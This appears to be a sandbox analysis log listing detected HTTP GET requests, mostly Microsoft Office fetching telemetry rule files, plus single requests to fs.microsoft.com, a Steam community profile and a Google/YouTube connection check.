                                Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                                Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-267163924&timestamp=1728264202403 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
